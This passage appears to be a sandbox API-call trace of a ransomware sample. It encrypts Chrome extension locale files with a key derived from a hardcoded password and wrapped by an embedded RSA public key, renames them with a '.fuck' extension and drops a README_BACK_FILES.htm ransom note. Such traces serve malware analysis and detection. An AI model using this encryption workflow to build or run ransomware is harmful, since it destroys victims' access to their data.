data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0260.595] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0260.595] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.596] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.598] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.598] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.600] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.600] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.600] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.600] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.600] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.600] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.600] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e71480) returned 1 [0260.601] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71480, dwCertEncodingType=0x1, pInfo=0x2eb2a40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2a70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2a78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d780) returned 1 [0260.601] CryptEncrypt (in: hKey=0x2e7d780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.601] CryptEncrypt (in: hKey=0x2e7d780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70848*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70848*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.601] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e70848*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70848*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.602] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xdf, lpOverlapped=0x0) returned 1 [0260.603] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xdf, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0260.603] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0260.603] CloseHandle (hObject=0x5d5c) returned 1 [0260.603] CloseHandle (hObject=0x5d64) returned 1 [0260.603] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0260.606] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0260.606] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0260.607] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0260.608] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.608] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.608] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.608] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.608] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.609] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0260.609] AreFileApisANSI () returned 1 [0260.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0260.609] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.609] GetFileType (hFile=0x5d60) returned 0x1 [0260.610] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.611] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.611] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.611] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.611] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.611] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.611] GetLastError () returned 0x0 [0260.611] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json")) returned 0x20 [0260.611] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0260.612] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.612] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.613] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.614] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.615] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.615] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.616] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.616] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.616] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.616] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.616] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e71370) returned 1 [0260.616] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71370, dwCertEncodingType=0x1, pInfo=0x2eb2be0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2c10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2c18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d640) returned 1 [0260.616] CryptEncrypt (in: hKey=0x2e7d640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.616] CryptEncrypt (in: hKey=0x2e7d640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70c88*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70c88*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.616] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e70c88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70c88*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.617] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x109, lpOverlapped=0x0) returned 1 [0260.619] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x109, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.619] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.619] CloseHandle (hObject=0x5d64) returned 1 [0260.619] CloseHandle (hObject=0x5d5c) returned 1 [0260.619] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0260.622] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0260.623] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0260.624] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0260.625] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.625] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.625] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.625] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.625] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.625] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0260.626] AreFileApisANSI () returned 1 [0260.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.626] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.626] GetFileType (hFile=0x5d60) returned 0x1 [0260.626] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.627] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.627] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.628] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.628] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.628] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.628] GetLastError () returned 0x0 [0260.628] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json")) returned 0x20 [0260.628] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0260.628] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.629] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.630] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.631] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.633] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.633] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.633] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.633] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.633] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.633] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.633] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70af0) returned 1 [0260.634] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70af0, dwCertEncodingType=0x1, 